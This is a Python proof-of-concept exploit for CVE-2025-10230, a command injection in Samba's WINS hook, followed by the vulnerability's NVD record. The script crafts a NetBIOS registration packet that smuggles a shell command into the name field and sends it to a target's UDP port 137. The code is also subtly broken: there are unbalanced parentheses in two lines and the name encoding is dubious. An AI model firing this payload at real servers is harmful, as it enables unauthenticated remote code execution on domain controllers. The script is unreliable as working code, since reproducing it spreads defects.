CVE-2025-10230

#!/usr/bin/env python3 """ CVE-2025-10230 PoC - Samba WINS Hook Command Injection This PoC demonstrates the vulnerability in Samba's WINS hook handling where NetBIOS names from registration packets are passed to shell without proper validation or escaping. WARNING: This code is for educational and authorized security testing only. """ import socket import struct import sys from datetime import datetime def create_netbios_name_registration(name, command_to_inject): """ Create a malformed NetBIOS name registration packet with command injection """ # NetBIOS name encoding (first byte is name length) encoded_name = bytes([len(name)]) + name.encode('ascii') + b' ' * (16 - len(name)) # Node type: Registered node_flags = 0x00 # Build the NetBIOS Name Registration Request transaction_id = struct.pack('!H', 0x1234) # Transaction ID flags = struct.pack('!H', 0x2900) # Flags: Broadcast, Registration questions = struct.pack('!H', 1) # Number of questions answer_rrs = struct.pack('!H', 0) authority_rrs = struct.pack('!H', 0) additional_rrs = struct.pack('!H', 0) # Question section question = encoded_name question += struct.pack('!H', 0x0020) # Type: NB (NetBIOS Name) question += struct.pack('!H', 0x0001) # Class: IN # Additional records with injected command inject_name = command_to_inject add_record = bytes([len(inject_name)]) + inject_name.encode('ascii') + b' ' * (16 - len(inject_name)) add_record += struct.pack('!H', 0x0021) # Type: NBSTAT add_record += struct.pack('!H', 0x0001) # Class: IN add_record += struct.pack('!I', 0) # TTL add_record += struct.pack('!H', 6) # RDLENGTH add_record += b'\x00' * 6 # RDATA (truncated) packet = transaction_id + flags + questions + answer_rrs + authority_rrs + additional_rrs packet += question + add_record return packet def send_wins_request(target_ip, target_port, packet): """ Send UDP packet to WINS service """ sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) sock.settimeout(5) try: print(f"[*] Sending malicious WINS registration request to {target_ip}:{target_port}") sock.sendto(packet, (target_ip, target_port)) try: response, addr = sock.recvfrom(4096) print(f"[+] Received response from {addr}") print(f"[+] Response length: {len(response)} bytes") return True except socket.timeout: print("[-] No response received (may still be vulnerable)") return True except Exception as e: print(f"[-] Error: {e}") return False finally: sock.close() def main(): if len(sys.argv) < 3: print("Usage: python3 cve_2025_10230_poc.py <target_ip> <command>") print("Example: python3 cve_2025_10230_poc.py 192.168.1.100 'touch /tmp/pwned'" sys.exit(1) target_ip = sys.argv[1] command = sys.argv[2] target_port = 137 # NetBIOS Name Service print(f"[*] CVE-2025-10230 - Samba WINS Hook Command Injection PoC") print(f"[*] Target: {target_ip}") print(f"[*] Command to inject: {command}") print(f"[*] Timestamp: {datetime.now().isoformat()}") # Create malicious packet base_name = "TEST" # The command injection happens when NetBIOS name is passed to shell malicious_name = f"{base_name}$(echo {command})") packet = create_netbios_name_registration(base_name, malicious_name) print(f"[*] Packet size: {len(packet)} bytes") # Send the packet success = send_wins_request(target_ip, target_port, packet) if success: print("[+] PoC packet sent successfully") print("[+] If vulnerable, the command should be executed by wins hook") if __name__ == "__main__": main()

{"cve": {"id": "CVE-2025-10230", "sourceIdentifier": "[email protected]", "published": "2025-11-07T20:15:35.630", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "A flaw was found in Samba, in the front-end WINS hook handling: NetBIOS names from registration packets are passed to a shell without proper validation or escaping. Unsanitized NetBIOS name data from WINS registration packets are inserted into a shell command and executed by the Samba Active Directory Domain Controller’s wins hook, allowing an unauthenticated network attacker to achieve remote command execution as the Samba process."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "baseScore": 10.0, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 6.0}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-78"}]}], "references": [{"url": "https://access.redhat.com/security/cve/CVE-2025-10230", "source": "[email protected]"}, {"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2394377", "source": "[email protected]"}, {"url": "https://www.samba.org/samba/history/security.html", "source": "[email protected]"}, {"url": "https://www.vicarius.io/vsociety/posts/cve-2025-10230-detect-samba-vulnerability", "source": "af854a3a-2127-422b-91ae-364da2661108"}, {"url": "https://www.vicarius.io/vsociety/posts/cve-2025-10230-mitigate-samba-vulnerability", "source": "af854a3a-2127-422b-91ae-364da2661108"}]}}